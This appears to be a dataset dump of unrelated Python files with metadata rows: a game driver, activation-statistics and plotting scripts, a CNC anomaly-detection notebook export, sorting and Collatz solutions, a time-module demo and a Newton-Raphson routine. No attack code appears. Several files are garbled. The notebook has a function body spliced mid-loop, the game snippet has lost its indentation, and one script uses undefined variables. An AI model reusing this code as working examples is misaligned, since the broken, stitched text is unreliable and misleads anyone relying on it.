print("Player 1, please select player type:\nh: HUMAN PLAYER\n1: RULES AI\n2: RANDOM AI\n3: MINIMAX AI\n4: ALPHA BETA AI\n")
player1Name = input("Choose:")
while player2Name not in ['h', 'H', '1', '2', '3', '4']:
print("\nPlayer 2, please select player type:\nh: HUMAN PLAYER\n1: RULES AI\n2: RANDOM AI\n3: MINIMAX AI\n4: ALPHA BETA AI\n")
player2Name = input("Choose:")
if player1Name in ['1', '2', '3', '4'] and player2Name in ['1', '2', '3', '4']:
repeatGames = int(input("\nHow many games would you like the AI to play: "))
while repeatGames < 1:
repeatGames = int(input("Please select 1 or more games. How many games would you like the AI to play: "))
else:
repeatGames = 1
for i in range(repeatGames):
ttt = Game()
while ttt.winnerVar == 0:
if not ttt.getEmpties():
seriesResults[0] += 1
print("\nGAME OVER")
print("Tie Game. Nobody Wins.")
print("Number of minimax calls for game #", sum(seriesResults), ": ", ttt.masterFC, sep="")
print("Move History:", ttt.moveHistory)
print("Final Board:\n", ttt.drawTheBoard(), "\n", sep="")
totalFC += ttt.masterFC
del ttt
break
if repeatGames < 2:
print("\nPlayer " + str(ttt.curPlayer) + "'s Turn")
print("The Current Board Is:")
print(ttt.drawTheBoard())
if ttt.curPlayer == 1:
if player1Name.lower() == "1":
computerPlayer(ttt)
elif player1Name.lower() == "2":
computerRandom(ttt)
elif player1Name.lower() == "3":
computerMinimax(ttt)
elif player1Name.lower() == "4":
computerAlphaBeta(ttt)
else:
userInput(ttt)
else:
if player2Name.lower() == "1":
computerPlayer(ttt)
elif player2Name.lower() == "2":
computerRandom(ttt)
elif player2Name.lower() == "3":
computerMinimax(ttt)
elif player2Name.lower() == "4":
computerAlphaBeta(ttt)
else:
userInput(ttt)
ttt.winnerVar = ttt.checkForWinner()
# print winnerVar
if ttt.winnerVar != 0:
seriesResults[ttt.curPlayer] += 1
# if (ttt.curPlayer == 1 and player1Name.lower() == "r") or (ttt.curPlayer == 2 and player2Name.lower() == "r"):
# print(ttt.moveHistory)
print("\nGAME OVER")
print("Winner: Player", ttt.winnerVar)
print("Number of minimax calls for game #", sum(seriesResults), ": ", ttt.masterFC, sep="")
print("Move History:", ttt.moveHistory)
print("Final Board:\n", ttt.drawTheBoard(), "\n", sep="")
totalFC += ttt.masterFC
del ttt
break
#alternate player
ttt.curPlayer = ttt.curPlayer % 2 + 1
if repeatGames > 1:
print("Final series results: ", seriesResults[0], "ties, ", seriesResults[1], "Player1 wins, ", seriesResults[2], "Player2 wins.")
print("Total Number of calls to the minimax algorithm for all games:", totalFC)
main()
| true |
eb9de6d661fa1ed71f06142a46caae0a59f52529 | Python | try1995/Linear-classifier | /activation_statistic.py | UTF-8 | 1,527 | 3.015625 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from time import time
'''激活函数策略和权值的选择'''
start = time()
D = np.random.randn(1000, 500)
hidden_layer_sizes = [500]*10
nonlinearities = ['tanh']*len(hidden_layer_sizes)
'''激活函数'''
act = {"relu": lambda x: np.maximum(0, x), 'tanh': lambda x: np.tanh(x),
'sigmoid': lambda x: 1/(1+np.exp(-x)), 'leaky_relu': lambda x: np.maximum(0.1*x, x),
'elu': lambda x: np.where(x > 0, x, np.exp(x)-1)}
Hs = {}
for i in range(len(hidden_layer_sizes)):
X = D if i == 0 else Hs[i-1]
fan_in = X.shape[1]
fan_out = hidden_layer_sizes[i]
'''不同的权重'''
W = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in)
# W = np.random.randn(fan_in, fan_in) * 0.01
# W = np.random.randn(fan_in, fan_in) / np.sqrt(fan_in/2)
H = np.dot(X, W)
H = act[nonlinearities[i]](H)
Hs[i] = H
print('input layer had mean %s and std %s' % (np.mean(D), np.std(D)))
layer_means = [np.mean(H) for i, H in Hs.items()]
layer_stds = [np.std(H) for i, H in Hs.items()]
for i, H in Hs.items():
print('hidden layer %s had mean %s and std %s' % (i+1, layer_means[i], layer_stds[i]))
'''图形展示'''
plt.figure()
plt.subplot(121)
plt.plot(Hs.keys(), layer_means, 'ob-')
plt.title('layer mean')
plt.subplot(122)
plt.plot(Hs.keys(), layer_stds, 'or-')
plt.title('layer std')
plt.figure()
for i, H in Hs.items():
plt.subplot(1, len(Hs), i+1)
plt.hist(H.ravel(), 30, range=(-1, 1))
end = time()
print(end-start)
plt.show()
| true |
f26eeb9f03ebac01629696e35ea122aa535e7bbf | Python | Kimseongick/2017_NIMS_CNC_Problem | /04_Code.py | UTF-8 | 8,933 | 2.625 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
data_1 = pd.read_csv('data/data_1.csv', header=None, index_col=None)
data_2 = pd.read_csv('data/data_2.csv', header=None, index_col=None)
data_3 = pd.read_csv('data/data_3.csv', header=None, index_col=None)
data_4 = pd.read_csv('data/data_4.csv', header=None, index_col=None)
data_5 = pd.read_csv('data/data_5.csv', header=None, index_col=None)
# In[3]:
data_frame1 = np.array(data_1[list(range(2,np.shape(data_1)[1]))])
data_frame2 = np.array(data_2[list(range(2,np.shape(data_2)[1]))])
data_frame3 = np.array(data_3[list(range(2,np.shape(data_3)[1]))])
data_frame4 = np.array(data_4[list(range(2,np.shape(data_4)[1]))])
data_frame5 = np.array(data_5[list(range(2,np.shape(data_5)[1]))])
# In[4]:
error_list1 = list(data_1[0])
error_list2 = list(data_2[0])
error_list3 = list(data_3[0])
error_list4 = list(data_4[0])
error_list5 = list(data_5[0])
# In[6]:
plt.figure(figsize=(16,9))
plt.subplot(331)
for i in range(len(data_frame1)):
plt.plot(data_frame1[i])
plt.subplot(332)
for i in range(len(data_frame2)):
plt.plot(data_frame2[i])
plt.subplot(333)
for i in range(len(data_frame3)):
plt.plot(data_frame3[i])
plt.subplot(334)
for i in range(len(data_frame4)):
plt.plot(data_frame4[i])
plt.subplot(335)
for i in range(len(data_frame5)):
plt.plot(data_frame5[i])
# -------------------------
# In[18]:
plt.figure(figsize=(16,9))
for i in range(len(data_frame1)):
if error_list1[i] == 0:
plt.plot(data_frame1[i],"b")
else:
plt.plot(data_frame1[i],"r")
print("error index : ", i)
# In[19]:
plt.figure(figsize=(16,9))
for i in range(len(data_frame2)):
if error_list2[i] == 0:
plt.plot(data_frame2[i],"b")
else:
plt.plot(data_frame2[i],"r")
print("error index : ", i)
# In[8]:
plt.figure(figsize=(16,9))
for i in range(len(data_frame3)):
if error_list3[i] == 0:
plt.plot(data_frame3[i],"b")
else:
plt.plot(data_frame3[i],"r")
print("error index : ", i)
# In[9]:
plt.figure(figsize=(16,9))
for i in range(len(data_frame4)):
if error_list4[i] == 0:
plt.plot(data_frame4[i],"b")
else:
plt.plot(data_frame4[i],"r")
print("error index : ", i)
# In[24]:
plt.figure(figsize=(16,9))
for i in range(len(data_frame5)):
if error_list5[i] == 0:
plt.plot(data_frame5[i],"b")
else:
plt.plot(data_frame5[i],"r")
print("error index : ", i)
# -----------------------------
# In[22]:
feature = np.mean(np.diff(data_frame2, axis=0), axis=1)
#feature2 = np.mean(data_frame1, axis=1)
# In[23]:
plt.plot(feature, ".")
# In[25]:
plt.figure(figsize=(12,9))
for i in range(len(data_frame2)):
plt.plot(data_frame2[i][30:150])
# In[14]:
for i in range(len(data_frame2)):
plt.plot(np.diff(data_frame2[i][50:150], axis=0))
# ## 공지사항 12월 26일
# - 저녁 식사 후 그룹을 나눌 예정입니다.
# - 수료증(참가 확인증)을 위해서는 저녁모임에도 참석하셔야 합니다.
# - 금요일 결과발표 지원자 받습니다.
# - 베이즈 정리 및 기타 통계적 접근
# - 다중 회귀분석
# - derivative
# ## 공지사항 12월 27일
# - 반갑습니다.
# - 금일 저녁은 만찬입니다.
# In[26]:
plt.figure(figsize=(16,9))
err_dt = []
for i in range(len(data_frame3)):
if error_list3[i] == 0:
plt.plot(data_frame3[i],"grey")
else:
err_dt.append(data_frame3[i])
# plt.plot(data_frame3[i])
print("error index : ", i)
for i in err_dt:
plt.plot(i)
plt.show()
# In[30]:
data_frame = data_frame5
error_list = error_list5
plt.figure(figsize=(16,9))
err_dt = []
for i in range(len(data_frame)):
if error_list[i] == 0:
plt.plot(data_frame[i],"grey")
else:
err_dt.append(data_frame[i])
# plt.plot(data_frame3[i])
print("error index : ", i)
for i in err_dt:
plt.plot(i)
plt.show()
# In[31]:
data_frame = data_frame4
error_list = error_list4
plt.figure(figsize=(16,9))
err_dt = []
for i in range(len(data_frame)):
if error_list[i] == 0:
plt.plot(data_frame[i],"#ECDADA")
else:
err_dt.append(data_frame[i])
print("error index : ", i)
for i in err_dt:
plt.plot(i)
plt.show()
# In[27]:
ever_list1 = []
for i in range(len(data_frame1)):
def func_chk(_data, _mean, _var, _Z_val):
_cnt = 0;
for _i in range(len(_data)):
if _data[_i] > (_mean[_i] + _var[_i]*_Z_val) or _data[_i] < (_mean[_i] - _var[_i]*_Z_val):
_cnt = _cnt + 1
return _cnt/len(_data)
def model_01(data_frame, diff_ratio, Z_val, train_size):
# initialize
n = 1
data_sum = data_frame[0]
data_square_sum = data_frame[0]*data_frame[0]
data_mean = data_sum/n
data_var = data_square_sum/n - data_mean*data_mean
data_sqrt = np.sqrt(data_var)
over_cnt = [0]
eval_anomaly = [0]
for i in range(1,len(data_frame)):
data, n = data_frame[i], i+1
if i > train_size:
over_cnt.append(func_chk(data,data_mean,data_sqrt,Z_val))
if over_cnt[i] > diff_ratio :
eval_anomaly.append(1)
else:
eval_anomaly.append(0)
else :
over_cnt.append(0)
eval_anomaly.append(0)
data_sum = data_sum + data
data_square_sum = data_square_sum + data*data
data_mean = data_sum/n
data_var = data_square_sum/n - data_mean*data_mean
data_sqrt = np.sqrt(data_var)
err_dt = []
plt.figure(figsize=(16,9))
plt.title("Total Data")
for i in range(len(data_frame)):
if eval_anomaly[i] == 1: # anomaly!
print("anomaly : ",i)
err_dt.append(data_frame[i])
break
else:
plt.plot(data_frame[i],"#ECDADA")
for i in err_dt:
plt.plot(i)
plt.show()
plt.figure(figsize=(6,4))
plt.title("Over count ratio")
plt.plot(over_cnt)
plt.show()
plt.figure(figsize=(6,4))
plt.title("Detect anomaly")
plt.plot(eval_anomaly)
plt.show() if error_list1[i] == 0:
ever_list1.append(data_frame1[i])
ever1 = np.mean(ever_list1, 0)
# In[28]:
def angle(v, u):
return np.arccos(np.dot(v, u)/(np.sqrt(np.dot(v,v))*np.sqrt(np.dot(u,u))))
# In[30]:
for i in range(len(data_frame1)):
if error_list1[i] == 0:
print 'good', angle(ever, data_frame1[i])
# In[31]:
for i in range(len(data_frame1)):
if error_list1[i] == 1:
print 'bad', angle(ever, data_frame1[i])
# In[32]:
ever_list2 = []
for i in range(len(data_frame2)):
if error_list2[i] == 0:
ever_list2.append(data_frame2[i])
ever2 = np.mean(ever_list2, 0)
for i in range(len(data_frame2)):
if error_list2[i] == 0:
print 'good', angle(ever2, data_frame2[i])
for i in range(len(data_frame2)):
if error_list2[i] == 1:
print 'bad', angle(ever2, data_frame2[i])
# In[34]:
def func_chk(_data, _mean, _var, _Z_val):
_cnt = 0;
for _i in range(len(_data)):
if _data[_i] > (_mean[_i] + _var[_i]*_Z_val) or _data[_i] < (_mean[_i] - _var[_i]*_Z_val):
_cnt = _cnt + 1
return _cnt/len(_data)
def model_01(data_frame, diff_ratio, Z_val, train_size):
# initialize
n = 1
data_sum = data_frame[0]
data_square_sum = data_frame[0]*data_frame[0]
data_mean = data_sum/n
data_var = data_square_sum/n - data_mean*data_mean
data_sqrt = np.sqrt(data_var)
over_cnt = [0]
eval_anomaly = [0]
for i in range(1,len(data_frame)):
data, n = data_frame[i], i+1
if i > train_size:
over_cnt.append(func_chk(data,data_mean,data_sqrt,Z_val))
if over_cnt[i] > diff_ratio :
eval_anomaly.append(1)
else:
eval_anomaly.append(0)
else :
over_cnt.append(0)
eval_anomaly.append(0)
data_sum = data_sum + data
data_square_sum = data_square_sum + data*data
data_mean = data_sum/n
data_var = data_square_sum/n - data_mean*data_mean
data_sqrt = np.sqrt(data_var)
err_dt = []
plt.figure(figsize=(16,9))
plt.title("Total Data")
for i in range(len(data_frame)):
if eval_anomaly[i] == 1: # anomaly!
print("anomaly : ",i)
err_dt.append(data_frame[i])
break
else:
plt.plot(data_frame[i],"#ECDADA")
for i in err_dt:
plt.plot(i)
plt.show()
plt.figure(figsize=(6,4))
plt.title("Over count ratio")
plt.plot(over_cnt)
plt.show()
plt.figure(figsize=(6,4))
plt.title("Detect anomaly")
plt.plot(eval_anomaly)
plt.show()
# In[ ]:
| true |
62ea2f4508ce0d0dc9efe8c61e76abeeacd98985 | Python | gustavobiage/URI_Solutions | /AD-HOC/1441.py | UTF-8 | 180 | 3.125 | 3 | [] | no_license | while 1:
hstr = input()
h = int(hstr)
if h == 0:
break
m = 1
while h != 1:
if h > m:
m = h
if h % 2 == 1:
h = 3 * h + 1
else:
h = h / 2
h = int(h)
print(m) | true |
f7a8ab7ad061c1a5433d7d9a1867909a30be186e | Python | hatopoppoK3/AtCoder-Practice | /AOJ/ALDS1/002/C.py | UTF-8 | 845 | 3.59375 | 4 | [] | no_license | def bubble_sort(A, N):
A = list(A)
for i in range(1, N):
for j in range(0, N-i):
if A[j][1] > A[j+1][1]:
A[j], A[j+1] = A[j+1], A[j]
tmp = []
for x, y in A:
tmp.append(x+str(y))
return tmp
def selection_sort(A, N):
A = list(A)
for i in range(0, N-1):
pivot = i
for j in range(i+1, N):
if A[pivot][1] > A[j][1]:
pivot = j
if pivot != i:
A[pivot], A[i] = A[i], A[pivot]
tmp = []
for x, y in A:
tmp.append(x+str(y))
return tmp
N = int(input())
X = list(map(str, input().split()))
A = []
for x in X:
A.append((x[0], int(x[1])))
A = tuple(A)
a = bubble_sort(A, N)
print(*a)
print('Stable')
b = selection_sort(A, N)
print(*b)
if a == b:
print('Stable')
else:
print('Not stable')
| true |
adc02d239be6ef8375f83e00f752deb9bfcb75c5 | Python | araghuram3/SF_NN | /evaluate_data.py | UTF-8 | 1,234 | 2.59375 | 3 | [] | no_license | # script to process data
# will depend on how the data is imported
# write now will assume it is placed in a folder "test" in the same directory
# import statments
import matplotlib.pyplot as plt
# tensorflow statements
import tensorflow as tf
layers = tf.keras.layers
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
tf.compat.v1.disable_eager_execution()
# import functions
from sf_nn_util import loadImagesFromDir, createConfMat, dispError, createData, visualizeWrongPredictions
# load in model
model_nameNpath = './sf_nn_model.h5'
new_model = load_model(model_nameNpath)
# evalueate the test data
path2data = './test/'
images = loadImagesFromDir(path2data, img_size) # might need an processing step to make it usable in testing
# test the data
predictions = new_model.predict(images)
predict_vec = np.empty(len(x_test),dtype=int)
for ind in range(len(predictions)):
predict_vec[ind] = np.argmax(predictions[ind])
plt.plot(predict_vec)
plt.xlabel('Frames')
plt.ylabel('Prediction')
plt.show()
# write now no way to test it without providing the ground truth | true |
1330e427651c295ed4b4cb79f33bc2bce1743d97 | Python | ycxzfforever/Python_Study | /time.py | UTF-8 | 1,184 | 3.515625 | 4 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time; # 引入time模块
import calendar;
ticks = time.time()
print "当前时间戳为:", ticks
localtime = time.localtime(time.time())
print "当前时间结构体:",localtime
print "当前时间:",time.asctime(localtime)
# 格式化成2016-03-20 11:45:39形式
print time.strftime("%Y-%m-%d %H:%M:%S %A %B %x %X %Z", time.localtime())
# 格式化成Sat Mar 28 22:24:24 2016形式
print time.strftime("%a %b %d %H:%M:%S %Y", time.localtime())
# 将格式字符串转换为时间戳
a = "Sat Mar 28 22:24:24 2016"
print time.mktime(time.strptime(a,"%a %b %d %H:%M:%S %Y"))
cal = calendar.month(2018, 5)
print "以下输出2016年5月份的日历:"
print cal;
import datetime;
i = datetime.datetime.now()
print ("当前的日期和时间是 %s" % i)
print ("ISO格式的日期和时间是 %s" % i.isoformat() )
print ("当前的年份是 %s" %i.year)
print ("当前的月份是 %s" %i.month)
print ("当前的日期是 %s" %i.day)
print ("dd/mm/yyyy 格式是 %s/%s/%s" % (i.day, i.month, i.year) )
print ("当前小时是 %s" %i.hour)
print ("当前分钟是 %s" %i.minute)
print ("当前秒是 %s" %i.second)
| true |
2a28c8391fc043e005b0e27e0109492299030186 | Python | KarenWest/pythonClassProjects | /newtonRaphsonMethod.py | UTF-8 | 1,090 | 4 | 4 | [] | no_license | #Summary - admittedly--had help from internet search here! Have not learned all these tricks yet.
# Solve for a zero of function using Newton-Raphson method
#Usage
# real = func(real)
# real = funcd(real)
# real = newton(func, funcd, real [, TOL=real])
#""" Ubiquitous Newton-Raphson algorithm for solving f(x) = 0 where a root is repeatedly estimated by x = x - f(x)/f'(x)
#until |dx|/(1+|x|) < TOL is achieved. This termination condition is a compromise between |dx| < TOL,
#if x is small |dx|/|x| < TOL, if x is large """
def newton(func, funcd, x, TOL=1e-6):
# f(x)=func(x), f'(x)=funcd(x)
f, fd = func(x), funcd(x)
count = 0
while 1:
dx = f / float(fd)
if abs(dx) < TOL * (1 + abs(x)):
return x - dx
x = x - dx
f, fd = func(x), funcd(x)
count = count + 1
print "newton(%d): x=%s, f(x)=%s" % (count, x, f)
#Even though it converges quadratically once a root has been "sighted", it does #not guarantee global convergence.
#So, I use print statement to see intermediate results.
| true |
d682a3f8a3332e2e45fd66d7cfdb97138375c071 | Python | KiranChavan326/sdet | /python/acc2.py | UTF-8 | 153 | 3.8125 | 4 | [] | no_license | num = int(input("Enter the number :"))
mod = num%2
if mod>0:
print("You picked the old number")
else:
print("You picked the even numer") | true |